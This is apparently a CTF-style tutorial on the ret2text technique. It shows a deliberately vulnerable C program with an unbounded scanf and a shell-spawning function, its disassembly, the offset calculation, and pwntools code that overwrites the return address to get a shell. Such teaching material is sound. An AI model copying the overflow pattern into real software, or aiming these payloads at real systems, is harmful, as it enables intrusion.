ret2text
<h1>🌓Attack analysis</h1>
<p>ret2text是ROP系列最简单的攻击方法, 主要是覆盖函数返回地址为程序里某一段可以获取shell的代码
以最简单的例子来讲</p>
<pre><code class="language-c">#include <stdlib.h>
#include <stdio.h>

/* Never called by the program, but present in .text: this is our ret2text target. */
void hint() {
    system("/bin/sh");
}

/* Vulnerable: scanf("%s") does not bound the number of bytes it writes into buf. */
void input() {
    char buf[0x20];
    printf("Input: ");
    scanf("%s", buf);
}

int main() {
    input();
    printf("Bye\n");
    return 0;
}
// gcc ret2text.c -o ret2text -no-pie -fno-stack-protector -m32</code></pre>
<p><img src="https://pic1.imgdb.cn/item/636fd11616f2c2beb1b57be4.png" alt="" />
The binary was compiled with the stack canary and PIE disabled (to keep the attack simple). The vulnerability is in input: the %s conversion of scanf does not bound the number of characters it reads, so an overlong line overflows buf. In the disassembly below, the pointer passed to scanf is <code>lea eax,[ebp-0x28]</code>, so buf (0x20 bytes) lives at ebp-0x28; above it sit 4 bytes of padding, the saved ebx at ebp-0x4, the saved ebp and then the return address. The disassembly of input is:</p>
<pre><code>08049225 <input>:
8049225: f3 0f 1e fb endbr32
8049229: 55 push ebp
804922a: 89 e5 mov ebp,esp
804922c: 53 push ebx
804922d: 83 ec 24 sub esp,0x24
8049230: e8 fb fe ff ff call 8049130 <__x86.get_pc_thunk.bx>
8049235: 81 c3 cb 2d 00 00 add ebx,0x2dcb
804923b: 83 ec 0c sub esp,0xc
804923e: 8d 83 10 e0 ff ff lea eax,[ebx-0x1ff0]
8049244: 50 push eax
8049245: e8 46 fe ff ff call 8049090 <printf@plt>
804924a: 83 c4 10 add esp,0x10
804924d: 83 ec 08 sub esp,0x8
8049250: 8d 45 d8 lea eax,[ebp-0x28]
8049253: 50 push eax
8049254: 8d 83 18 e0 ff ff lea eax,[ebx-0x1fe8]
804925a: 50 push eax
804925b: e8 70 fe ff ff call 80490d0 <__isoc99_scanf@plt>
8049260: 83 c4 10 add esp,0x10
8049263: 90 nop
8049264: 8b 5d fc mov ebx,DWORD PTR [ebp-0x4]
8049267: c9 leave
8049268: c3 ret</code></pre>
<p><img src="https://pic1.imgdb.cn/item/636fd17016f2c2beb1b62fd6.png" alt="" />
Moreover, the program hands us a function, hint, that spawns a shell:</p>
<pre><code>080491f6 <hint>:
80491f6: f3 0f 1e fb endbr32
80491fa: 55 push ebp
80491fb: 89 e5 mov ebp,esp
80491fd: 53 push ebx
80491fe: 83 ec 04 sub esp,0x4
8049201: e8 a7 00 00 00 call 80492ad <__x86.get_pc_thunk.ax>
8049206: 05 fa 2d 00 00 add eax,0x2dfa
804920b: 83 ec 0c sub esp,0xc
804920e: 8d 90 08 e0 ff ff lea edx,[eax-0x1ff8]
8049214: 52 push edx
8049215: 89 c3 mov ebx,eax
8049217: e8 94 fe ff ff call 80490b0 <system@plt>
804921c: 83 c4 10 add esp,0x10
804921f: 90 nop
8049220: 8b 5d fc mov ebx,DWORD PTR [ebp-0x4]
8049223: c9 leave
8049224: c3 ret</code></pre>
<p>hint starts at <code>0x80491f6</code>; because the binary is not PIE this address is fixed, so it can be hardcoded. The 0x28 bytes of padding cover buf, the padding and the saved ebx; clobbering ebx is harmless because hint recomputes it with get_pc_thunk.ax. The final payload is therefore:</p>
<pre><code class="language-py">payload = b'a'*0x28   # distance from buf to the saved ebp (buf + padding + saved ebx)
payload += b'a'*4     # saved ebp (any value works, nothing uses it after the ret)
payload += p32(0x80491f6)  # overwrite the return address with the address of hint</code></pre>
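<p>As an added example (not code from the original page), the following Python derives the padding from the <code>lea eax,[ebp-0x28]</code> in the disassembly above, packs the hint address little-endian without pwntools, and checks the finished payload for the bytes at which scanf("%s") would stop reading (the C-locale whitespace characters; the newline appended by sendline is what terminates the read). The disassembly excerpt embedded in the script is copied from the listing above; the helper names are my own.</p>

```python
import re
import struct

# scanf("%s") stops at the first byte that isspace() accepts in the C locale.
# None of these may occur inside the payload, or the bytes after it are never
# written to buf.
SCANF_S_TERMINATORS = frozenset(b"\t\n\x0b\x0c\r ")


def p32(value):
    """Pack a 32-bit little-endian value (same layout as pwntools' p32 on i386)."""
    return struct.pack("<I", value)


def buf_offset_from_disasm(disasm):
    """Recover the distance from buf to the saved ebp from the disassembly.

    The compiler loads buf's address for scanf with `lea eax,[ebp-0x28]`,
    so the displacement of that lea is how far buf sits below ebp.
    """
    m = re.search(r"lea\s+eax,\[ebp-0x([0-9a-f]+)\]", disasm)
    if m is None:
        raise ValueError("no `lea eax,[ebp-0x..]` found in disassembly")
    return int(m.group(1), 16)


def build_ret2text_payload(buf_to_ebp, target, filler=b"a"):
    """Lay out padding | saved ebp | return address for an i386 frame."""
    payload = filler * buf_to_ebp      # buf, padding and saved ebx, up to the saved ebp
    payload += filler * 4              # saved ebp (garbage is fine, nothing uses it)
    payload += p32(target)             # return address -> target function
    return payload


def scanf_s_bad_bytes(payload):
    """Return the sorted list of bytes in payload that would stop scanf("%s") early."""
    return sorted(set(payload) & SCANF_S_TERMINATORS)


# Excerpt of the `input` disassembly from the page (the three lines around the
# scanf argument setup), embedded here so the script runs offline.
INPUT_DISASM = """
8049250: 8d 45 d8 lea eax,[ebp-0x28]
8049253: 50 push eax
8049254: 8d 83 18 e0 ff ff lea eax,[ebx-0x1fe8]
"""
HINT_ADDR = 0x80491F6   # address of hint from the disassembly; fixed because -no-pie


def ret2text_payload():
    """Build the payload for this binary and refuse it if scanf would truncate it."""
    offset = buf_offset_from_disasm(INPUT_DISASM)   # 0x28
    payload = build_ret2text_payload(offset, HINT_ADDR)
    bad = scanf_s_bad_bytes(payload)
    if bad:
        raise ValueError(f"payload contains scanf(\"%s\") terminators: {bad}")
    return payload


if __name__ == "__main__":
    pl = ret2text_payload()
    print(len(pl), pl)
```

<p>The terminator check matters more than it looks: had hint been located at an address such as 0x0804900a, the 0x0a byte in its little-endian encoding would have ended the scanf read before the full return address was written, and the exploit would fail silently.</p>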
<p><img src="https://pic1.imgdb.cn/item/636fd1e016f2c2beb1b731c2.png" alt="" /></p>
<h2>🌙Exploit</h2>
<pre><code class="language-py">from pwn import *

o = process('./ret2text')

payload = b'a' * 0x28        # buf + padding + saved ebx, up to the saved ebp
payload += b'a' * 4          # saved ebp
payload += p32(0x80491f6)    # return address -> hint()

o.sendline(payload)          # the trailing newline terminates scanf("%s")
o.interactive()</code></pre>
<p><img src="https://pic1.imgdb.cn/item/636fd25216f2c2beb1b7fd4a.png" alt="" /></p>